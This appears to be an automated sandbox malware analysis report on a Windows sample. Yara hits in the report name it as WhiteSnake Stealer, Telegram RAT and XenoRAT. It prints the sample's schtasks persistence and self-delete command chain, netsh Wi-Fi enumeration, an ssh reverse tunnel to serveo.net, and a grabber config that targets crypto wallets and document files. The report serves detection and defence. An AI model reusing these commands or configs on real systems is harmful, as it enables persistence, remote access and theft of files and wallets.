Source: 0LpFv1haTA.exe, 0000000D.00000002.2439788315.000001E4481F2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll=@
Source: 0LpFv1haTA.exe, 00000000.00000002.2104891776.0000019457E92000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: -b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}[o
Source: 0LpFv1haTA.exe, 0000000D.00000002.2442666670.000001E459E15000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: 0LpFv1haTA.exe, 0000002E.00000002.3230872411.000001B2AF9D2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll''g
Source: 0LpFv1haTA.exe, 0000000D.00000002.2442666670.000001E459E15000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: 0LpFv1haTA.exe, 0000000D.00000002.2442666670.000001E459E15000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: global block list test formVMware20,11696428655
Source: Amcache.hve.36.dr Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: 0LpFv1haTA.exe, 00000007.00000002.4565048036.0000021F0F6EB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: 0LpFv1haTA.exe, 0000000D.00000002.2442666670.000001E459E15000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: Amcache.hve.36.dr Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: 0LpFv1haTA.exe, 0000000D.00000002.2442666670.000001E459E15000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: Amcache.hve.36.dr Binary or memory string: vmci.sys
Source: 0LpFv1haTA.exe, 0000000D.00000002.2442666670.000001E459E15000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: AMC password management pageVMware20,11696428655
Source: 0LpFv1haTA.exe, 0000000D.00000002.2442666670.000001E459E15000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: tasks.office.comVMware20,11696428655o
Source: 0LpFv1haTA.exe, 0000000D.00000002.2442666670.000001E459E15000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: 0LpFv1haTA.exe, 0000000D.00000002.2442666670.000001E459E15000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: 0LpFv1haTA.exe, 0000000D.00000002.2442666670.000001E459E15000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: Amcache.hve.36.dr Binary or memory string: VMware20,1
Source: Amcache.hve.36.dr Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.36.dr Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.36.dr Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: 0LpFv1haTA.exe, 0000000D.00000002.2442666670.000001E459E15000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: Amcache.hve.36.dr Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.36.dr Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.36.dr Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.36.dr Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.36.dr Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.36.dr Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: 0LpFv1haTA.exe, 0000000D.00000002.2442666670.000001E459E15000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: 0LpFv1haTA.exe, 0000000D.00000002.2442666670.000001E459E15000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
Source: ssh.exe, 0000001F.00000002.4563063171.000001E39F239000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll^^
Source: Amcache.hve.36.dr Binary or memory string: vmci.inf_amd64_68ed49469341f563
Source: 0LpFv1haTA.exe, 0000000D.00000002.2442666670.000001E459E15000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: Amcache.hve.36.dr Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.36.dr Binary or memory string: vmci.syshbin
Source: Amcache.hve.36.dr Binary or memory string: VMware, Inc.
Source: 0LpFv1haTA.exe, 0000000D.00000002.2442666670.000001E459E15000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: discord.comVMware20,11696428655f
Source: Amcache.hve.36.dr Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.36.dr Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: manager.exe, 0000002A.00000002.4561656216.000000000158B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll?6
Source: Amcache.hve.36.dr Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: 0LpFv1haTA.exe, 0000000D.00000002.2442666670.000001E459E15000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: 0LpFv1haTA.exe, 0LpFv1haTA.exe.0.dr Binary or memory string: qemu'#
Source: Amcache.hve.36.dr Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: 0LpFv1haTA.exe, 0000000D.00000002.2442666670.000001E459E15000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: 0LpFv1haTA.exe, 0000000D.00000002.2442666670.000001E459E15000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: 0LpFv1haTA.exe, 0000000D.00000002.2442666670.000001E459E15000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
Source: 0LpFv1haTA.exe, 0000000D.00000002.2442666670.000001E459E15000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: Amcache.hve.36.dr Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: 0LpFv1haTA.exe, 0000000D.00000002.2442666670.000001E459E15000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: 0LpFv1haTA.exe, 0000000D.00000002.2442666670.000001E459E15000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: 0LpFv1haTA.exe, 0000000D.00000002.2442666670.000001E459E15000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: Amcache.hve.36.dr Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: ssh.exe, 00000018.00000002.4563139619.0000020D735EA000.00000004.00000020.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000028.00000002.2640663700.0000019232F75000.00000004.00000020.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000002F.00000002.3881086049.0000028989870000.00000004.00000020.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000030.00000002.4457586264.000001ADB3577000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: 0LpFv1haTA.exe, 0000000D.00000002.2442666670.000001E459E15000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: 0LpFv1haTA.exe, 0000000D.00000002.2442666670.000001E459E15000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: outlook.office.comVMware20,11696428655s
Source: 0LpFv1haTA.exe, 0000000D.00000002.2442666670.000001E459E15000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: 0LpFv1haTA.exe, 0000000D.00000002.2442666670.000001E459E15000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: 0LpFv1haTA.exe, 00000007.00000002.4651451428.0000021F2AE09000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}B
Source: Amcache.hve.36.dr Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: Amcache.hve.36.dr Binary or memory string: vmci.syshbin`
Source: 0LpFv1haTA.exe, 0000000D.00000002.2442666670.000001E459E15000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: Amcache.hve.36.dr Binary or memory string: \driver\vmci,\driver\pci
Source: 0LpFv1haTA.exe, 0000000D.00000002.2442666670.000001E459E15000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: dev.azure.comVMware20,11696428655j
Source: Amcache.hve.36.dr Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: 0LpFv1haTA.exe, 0000000D.00000002.2442666670.000001E459E15000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: Amcache.hve.36.dr Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: 0LpFv1haTA.exe, 0000000D.00000002.2442666670.000001E459E15000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information queried: ProcessInformation Jump to behavior
Checks if the current process is being debugged
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process queried: DebugPort
Enables debug privileges
Source: C:\Users\user\Desktop\0LpFv1haTA.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process token adjusted: Debug
Source: C:\Users\user\Desktop\0LpFv1haTA.exe Memory allocated: page read and write | page guard Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\0LpFv1haTA.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C chcp 65001 && timeout /t 3 > NUL && schtasks /create /tn "0LpFv1haTA" /sc MINUTE /tr "C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe" /rl HIGHEST /f && DEL /F /S /Q /A "C:\Users\user\Desktop\0LpFv1haTA.exe" &&START "" "C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\chcp.com chcp 65001 Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\timeout.exe timeout /t 3 Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\schtasks.exe schtasks /create /tn "0LpFv1haTA" /sc MINUTE /tr "C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe" /rl HIGHEST /f Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe "C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process created: C:\Windows\System32\cmd.exe "cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]" Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process created: C:\Windows\System32\cmd.exe "cmd.exe" /c chcp 65001 && netsh wlan show networks mode=bssid | findstr "SSID BSSID Signal" Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process created: C:\Windows\System32\cmd.exe "cmd.exe" /c chcp 65001 && netsh wlan show networks mode=bssid | findstr "SSID BSSID Signal" Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process created: C:\Users\user\AppData\Roaming\manager.exe "C:\Users\user\AppData\Roaming\manager.exe" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\netsh.exe netsh wlan show profiles
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\findstr.exe findstr /R /C:"[ ]:[ ]"
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process created: C:\Windows\System32\cmd.exe "cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]"
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process created: C:\Windows\System32\cmd.exe "cmd.exe" /c chcp 65001 && netsh wlan show networks mode=bssid | findstr "SSID BSSID Signal"
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process created: C:\Windows\System32\OpenSSH\ssh.exe "ssh.exe" -o "StrictHostKeyChecking=no" -R 80:127.0.0.1:7634 serveo.net
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\netsh.exe netsh wlan show networks mode=bssid
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\findstr.exe findstr "SSID BSSID Signal"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\netsh.exe netsh wlan show profiles
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\findstr.exe findstr /R /C:"[ ]:[ ]"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\netsh.exe netsh wlan show networks mode=bssid
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\findstr.exe findstr "SSID BSSID Signal"
Source: C:\Users\user\AppData\Roaming\manager.exe Process created: C:\Users\user\AppData\Roaming\XenoManager\manager.exe "C:\Users\user\AppData\Roaming\XenoManager\manager.exe"
Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exe Process created: C:\Windows\SysWOW64\schtasks.exe "schtasks.exe" /Create /TN "mswindow" /XML "C:\Users\user\AppData\Local\Temp\tmp4A67.tmp" /F
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: C:\Users\user\Desktop\0LpFv1haTA.exe Process created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c chcp 65001 && timeout /t 3 > nul && schtasks /create /tn "0lpfv1hata" /sc minute /tr "c:\users\user\appdata\local\starlabs\0lpfv1hata.exe" /rl highest /f && del /f /s /q /a "c:\users\user\desktop\0lpfv1hata.exe" &&start "" "c:\users\user\appdata\local\starlabs\0lpfv1hata.exe"
Source: C:\Users\user\Desktop\0LpFv1haTA.exe Process created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c chcp 65001 && timeout /t 3 > nul && schtasks /create /tn "0lpfv1hata" /sc minute /tr "c:\users\user\appdata\local\starlabs\0lpfv1hata.exe" /rl highest /f && del /f /s /q /a "c:\users\user\desktop\0lpfv1hata.exe" &&start "" "c:\users\user\appdata\local\starlabs\0lpfv1hata.exe" Jump to behavior
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\0LpFv1haTA.exe Queries volume information: C:\Users\user\Desktop\0LpFv1haTA.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Queries volume information: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe VolumeInformation Jump to behavior
Source: C:\Windows\System32\netsh.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Queries volume information: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe VolumeInformation
Source: C:\Windows\System32\netsh.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\netsh.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\netsh.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Queries volume information: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\manager.exe Queries volume information: C:\Users\user\AppData\Roaming\manager.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exe Queries volume information: C:\Users\user\AppData\Roaming\XenoManager\manager.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exe Queries volume information: C:\Users\user\AppData\Roaming\XenoManager\manager.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Queries volume information: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Queries volume information: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Queries volume information: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe VolumeInformation
Source: C:\Users\user\Desktop\0LpFv1haTA.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings
barindex
Uses netsh to modify the Windows network and firewall settings
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\netsh.exe netsh wlan show profiles
AV process strings found (often used to terminate AV products)
Source: Amcache.hve.36.dr Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.36.dr Binary or memory string: msmpeng.exe
Source: Amcache.hve.36.dr Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.36.dr Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information
barindex
Yara detected Telegram RAT
Source: Yara match File source: Process Memory Space: 0LpFv1haTA.exe PID: 1964, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 0LpFv1haTA.exe PID: 5500, type: MEMORYSTR
Yara detected WhiteSnake Stealer
Source: Yara match File source: Process Memory Space: 0LpFv1haTA.exe PID: 1964, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 0LpFv1haTA.exe PID: 5500, type: MEMORYSTR
Yara detected XenoRAT
Source: Yara match File source: 41.0.manager.exe.240000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000029.00000000.2648249695.0000000000242000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: manager.exe PID: 8056, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Roaming\manager.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Roaming\XenoManager\manager.exe, type: DROPPED
Found many strings related to Crypto-Wallets (likely being stolen)
Source: 0LpFv1haTA.exe, 00000000.00000002.2105344056.0000019459C0A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: eoihofec</string></args></command><command name="3"><args><string>Phantom</string><string>bfnaelmomeimhlpmgjnjophhpkkoljpa</string></args></command><command name="0"><args><string>%UserProfile%\Desktop</string><string>doc.*;docx.*;xls.*;xlsx.*;ppt.*;pptx.*;pdf.*;txt.*;rtf.*;odt.*;ods.*;odp.*;csv.*;html.*;htm.*;epub.*;md.*;tex.*;wpd.*;wps.*;pub.*;xps.*;odg.*;ott.*;ots.*;otp.*;msg.*;eml.*;crt.*;cer.*;pem.*;der.*;p7b.*;p7c.*;pfx.*;p12.*;sst.*;csr.*;key.*;private.*;sig.*;signature.*;p7s.*;asc.*;gpg.*;authenticode.*;kdb.*;kdbx.*;agilekeychain.*;opvault.*;lastpass.*;psafe3.*;ovpn.*;log.*;cfg.*;conf.*;c.*;cpp.*;cc.*;cxx.*;hpp.*;cs.*;java.*;ts.*;php.*;rb.*;rs.*;swift.*;kt.*;kts.*;pl.*;r.*;sh.*;lua.*;py.*;go.*;</string><string>Grabber\Desktop Files</string></args></command><command name="0"><args><string>%UserProfile%\Documents</string><string>doc.*;docx.*;xls.*;xlsx.*;ppt.*;pptx.*;pdf.*;txt.*;rtf.*;odt.*;ods.*;odp.*;csv.*;html.*;htm.*;epub.*;md.*;tex.*;wpd.*;wps.*;pub.*;xps.*;odg.*;ott.*;ots.*;otp.*;msg.*;eml.*;crt.*;cer.*;pem.*;der.*;p7b.*;p7c.*;pfx.*;p12.*;sst.*;csr.*;key.*;private.*;sig.*;signature.*;p7s.*;asc.*;gpg.*;authenticode.*;kdb.*;kdbx.*;agilekeychain.*;opvault.*;lastpass.*;psafe3.*;ovpn.*;log.*;cfg.*;conf.*;c.*;cpp.*;cc.*;cxx.*;hpp.*;cs.*;java.*;ts.*;php.*;rb.*;rs.*;swift.*;kt.*;kts.*;pl.*;r.*;sh.*;lua.*;py.*;go.*;</string><string>Grabber\Documents</string></args></command><command name="0"><args><string>%UserProfile%\Downloads</string><string>doc.*;docx.*;xls.*;xlsx.*;ppt.*;pptx.*;pdf.*;txt.*;rtf.*;odt.*;ods.*;odp.*;csv.*;html.*;htm.*;epub.*;md.*;tex.*;wpd.*;wps.*;pub.*;xps.*;odg.*;ott.*;ots.*;otp.*;msg.*;eml.*;crt.*;cer.*;pem.*;der.*;p7b.*;p7c.*;pfx.*;p12.*;sst.*;csr.*;key.*;private.*;sig.*;signature.*;p7s.*;asc.*;gpg.*;authenticode.*;kdb.*;kdbx.*;agilekeychain.*;opvault.*;lastpass.*;psafe3.*;ovpn.*;log.*;cfg.*;conf.*;c.*;cpp.*;cc.*;cxx.*;hpp.*;cs.*;java.*;ts.*;php.*;rb.*;rs.*;swift.*;kt.*;kts.*;pl.*;r.*;sh.*;lua.*;py.*;go.*;</string><string>Grabber\Downloads</string></args></command><command name="6"/> </commands></Commands>g></args></command><command name="0"><args><string>%LocalAppData%\Coinomi\Coinomi\wallets</string><string>*.wallet</string><string>Grabber\Wallets\Coinomi</string></args></command><command name="0"><args><string>%AppData%\Bitcoin\wallets</string><string>*\*wallet*</string><string>Grabber\Wallets\Bitcoin</string></args></command><command name="0"><args><string>%AppData%\Electrum\wallets</string><string>*</string><string>Grabber\Wallets\Electrum</string></args></command><command name="0"><args><string>%AppData%\Electrum-LTC\wallets</string><string>*</string><string>Grabber\Wallets\Electrum-LTC</string></args></command><command name="0"><args><string>%AppData%\Zcash</string><string>*wallet*dat</string><string>Grabber\Wallets\Zcash</string></args></command><command name="0"><args><string>%AppData%\Exodus</string><string>exodus.conf.json;exodus.wallet\*.seco</string><string>Grabber\Wallets\Exodus</string></args></command><c
Source: 0LpFv1haTA.exe, 00000000.00000002.2105344056.0000019459C0A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: eoihofec</string></args></command><command name="3"><args><string>Phantom</string><string>bfnaelmomeimhlpmgjnjophhpkkoljpa</string></args></command><command name="0"><args><string>%UserProfile%\Desktop</string><string>doc.*;docx.*;xls.*;xlsx.*;ppt.*;pptx.*;pdf.*;txt.*;rtf.*;odt.*;ods.*;odp.*;csv.*;html.*;htm.*;epub.*;md.*;tex.*;wpd.*;wps.*;pub.*;xps.*;odg.*;ott.*;ots.*;otp.*;msg.*;eml.*;crt.*;cer.*;pem.*;der.*;p7b.*;p7c.*;pfx.*;p12.*;sst.*;csr.*;key.*;private.*;sig.*;signature.*;p7s.*;asc.*;gpg.*;authenticode.*;kdb.*;kdbx.*;agilekeychain.*;opvault.*;lastpass.*;psafe3.*;ovpn.*;log.*;cfg.*;conf.*;c.*;cpp.*;cc.*;cxx.*;hpp.*;cs.*;java.*;ts.*;php.*;rb.*;rs.*;swift.*;kt.*;kts.*;pl.*;r.*;sh.*;lua.*;py.*;go.*;</string><string>Grabber\Desktop Files</string></args></command><command name="0"><args><string>%UserProfile%\Documents</string><string>doc.*;docx.*;xls.*;xlsx.*;ppt.*;pptx.*;pdf.*;txt.*;rtf.*;odt.*;ods.*;odp.*;csv.*;html.*;htm.*;epub.*;md.*;tex.*;wpd.*;wps.*;pub.*;xps.*;odg.*;ott.*;ots.*;otp.*;msg.*;eml.*;crt.*;cer.*;pem.*;der.*;p7b.*;p7c.*;pfx.*;p12.*;sst.*;csr.*;key.*;private.*;sig.*;signature.*;p7s.*;asc.*;gpg.*;authenticode.*;kdb.*;kdbx.*;agilekeychain.*;opvault.*;lastpass.*;psafe3.*;ovpn.*;log.*;cfg.*;conf.*;c.*;cpp.*;cc.*;cxx.*;hpp.*;cs.*;java.*;ts.*;php.*;rb.*;rs.*;swift.*;kt.*;kts.*;pl.*;r.*;sh.*;lua.*;py.*;go.*;</string><string>Grabber\Documents</string></args></command><command name="0"><args><string>%UserProfile%\Downloads</string><string>doc.*;docx.*;xls.*;xlsx.*;ppt.*;pptx.*;pdf.*;txt.*;rtf.*;odt.*;ods.*;odp.*;csv.*;html.*;htm.*;epub.*;md.*;tex.*;wpd.*;wps.*;pub.*;xps.*;odg.*;ott.*;ots.*;otp.*;msg.*;eml.*;crt.*;cer.*;pem.*;der.*;p7b.*;p7c.*;pfx.*;p12.*;sst.*;csr.*;key.*;private.*;sig.*;signature.*;p7s.*;asc.*;gpg.*;authenticode.*;kdb.*;kdbx.*;agilekeychain.*;opvault.*;lastpass.*;psafe3.*;ovpn.*;log.*;cfg.*;conf.*;c.*;cpp.*;cc.*;cxx.*;hpp.*;cs.*;java.*;ts.*;php.*;rb.*;rs.*;swift.*;kt.*;kts.*;pl.*;r.*;sh.*;lua.*;py.*;go.*;</string><string>Grabber\Downloads</string></args></command><command name="6"/> </commands></Commands>g></args></command><command name="0"><args><string>%LocalAppData%\Coinomi\Coinomi\wallets</string><string>*.wallet</string><string>Grabber\Wallets\Coinomi</string></args></command><command name="0"><args><string>%AppData%\Bitcoin\wallets</string><string>*\*wallet*</string><string>Grabber\Wallets\Bitcoin</string></args></command><command name="0"><args><string>%AppData%\Electrum\wallets</string><string>*</string><string>Grabber\Wallets\Electrum</string></args></command><command name="0"><args><string>%AppData%\Electrum-LTC\wallets</string><string>*</string><string>Grabber\Wallets\Electrum-LTC</string></args></command><command name="0"><args><string>%AppData%\Zcash</string><string>*wallet*dat</string><string>Grabber\Wallets\Zcash</string></args></command><command name="0"><args><string>%AppData%\Exodus</string><string>exodus.conf.json;exodus.wallet\*.seco</string><string>Grabber\Wallets\Exodus</string></args></command><c
